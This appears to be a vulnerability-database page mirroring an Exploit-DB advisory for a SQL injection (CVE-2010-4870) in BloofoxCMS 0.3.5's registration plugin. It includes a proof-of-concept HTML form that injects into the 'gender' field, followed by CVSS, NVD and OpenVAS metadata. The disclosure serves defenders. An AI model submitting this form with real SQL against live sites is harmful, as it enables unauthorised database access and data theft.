Search...

BloofoxCMS Registration Plugin SQL Injection Vulnerability

2010-10-27T00:00:00

ID EDB-ID:15328
Type exploitdb
Reporter High-Tech Bridge SA
Modified 2010-10-27T00:00:00

Description

BloofoxCMS Registration Plugin SQL Injection Vulnerability. CVE-2010-4870. Webapps exploit for php platform

                                        
                                            Vulnerability ID: HTB22658
Reference: http://www.htbridge.ch/advisory/sql_injection_in_bloofoxcms_registration_plugin.html
Product: BloofoxCMS 
Vendor: bloofox.com ( http://bloofox.com/ ) 
Vulnerable Version: 0.3.5 and probably prior versions 
Vendor Notification: 13 October 2010 
Vulnerability Type: SQL Injection
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in gender variable.

The following PoC is available:


&lt;form action="http://host/index.php?page=8" method="post"&gt;
&lt;input type="hidden" name="un" value="testuser"&gt;
&lt;input type="hidden" name="pwd" value="123456"&gt;
&lt;input type="hidden" name="pwd2" value="123456"&gt;
&lt;input type="hidden" name="em" value="email@email.com"&gt;
&lt;input type="hidden" name="gender" value="'SQL_CODE_HERE"&gt;
&lt;input name="send" value="Register & Create Account" type="submit"&gt;
&lt;/form&gt;

JSON Vulners Source

Initial Source

{"published": "2010-10-27T00:00:00", "id": "EDB-ID:15328", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "00d82df72ec9697194ab1c347e8043244ddba018a87525c7bc75828fa30a11d4", "description": "BloofoxCMS Registration Plugin SQL Injection Vulnerability. CVE-2010-4870. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/15328/", "lastseen": "2016-02-01T21:35:06", "edition": 1, "title": "BloofoxCMS Registration Plugin SQL Injection Vulnerability", "osvdbidlist": ["71322"], "modified": "2010-10-27T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-4870"], "sourceHref": "https://www.exploit-db.com/download/15328/", "references": [], "reporter": "High-Tech Bridge SA", "sourceData": "Vulnerability ID: HTB22658\r\nReference: http://www.htbridge.ch/advisory/sql_injection_in_bloofoxcms_registration_plugin.html\r\nProduct: BloofoxCMS \r\nVendor: bloofox.com ( http://bloofox.com/ ) \r\nVulnerable Version: 0.3.5 and probably prior versions \r\nVendor Notification: 13 October 2010 \r\nVulnerability Type: SQL Injection\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: High \r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) \r\n\r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the \"/index.php\" script to properly sanitize user-supplied input in gender variable.\r\n\r\nThe following PoC is available:\r\n\r\n\r\n<form action=\"http://host/index.php?page=8\" method=\"post\">\r\n<input type=\"hidden\" name=\"un\" value=\"testuser\">\r\n<input type=\"hidden\" name=\"pwd\" value=\"123456\">\r\n<input type=\"hidden\" name=\"pwd2\" value=\"123456\">\r\n<input type=\"hidden\" name=\"em\" value=\"email@email.com\">\r\n<input type=\"hidden\" name=\"gender\" value=\"'SQL_CODE_HERE\">\r\n<input name=\"send\" value=\"Register & Create Account\" type=\"submit\">\r\n</form>\r\n\r\n\r\n\r\n", "objectVersion": "1.0"}

{"result": {"cve": [{"id": "CVE-2010-4870", "type": "cve", "title": "CVE-2010-4870", "description": "SQL injection vulnerability in index.php in BloofoxCMS 0.3.5 allows remote attackers to execute arbitrary SQL commands via the gender parameter.", "published": "2011-10-07T06:55:06", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4870", "cvelist": ["CVE-2010-4870"], "lastseen": "2017-08-29T11:19:04"}], "openvas": [{"id": "OPENVAS:100877", "type": "openvas", "title": "bloofoxCMS 'gender' Parameter SQL Injection Vulnerability", "description": "bloofoxCMS is prone to an SQL-injection vulnerability because it\nfails to sufficiently sanitize user-supplied data before using it in\nan SQL query.\n\nExploiting this issue can allow an attacker to compromise the\napplication, access or modify data, or exploit latent vulnerabilities\nin the underlying database.\n\nbloofoxCMS 0.3.5 is vulnerable; other versions may also be affected.", "published": "2010-10-28T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=100877", "cvelist": ["CVE-2010-4870"], "lastseen": "2017-07-02T21:09:54"}, {"id": "OPENVAS:1361412562310100877", "type": "openvas", "title": "bloofoxCMS 'gender' Parameter SQL Injection Vulnerability", "description": "bloofoxCMS is prone to an SQL-injection vulnerability because it fails to\nsufficiently sanitize user-supplied data before using it in an SQL query.\n\nExploiting this issue can allow an attacker to compromise the application, access or modify data, or exploit\nlatent vulnerabilities in the underlying database.\n\nbloofoxCMS 0.3.5 is vulnerable; other versions may also be affected.", "published": "2010-10-28T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100877", "cvelist": ["CVE-2010-4870"], "lastseen": "2018-01-26T11:05:35"}]}}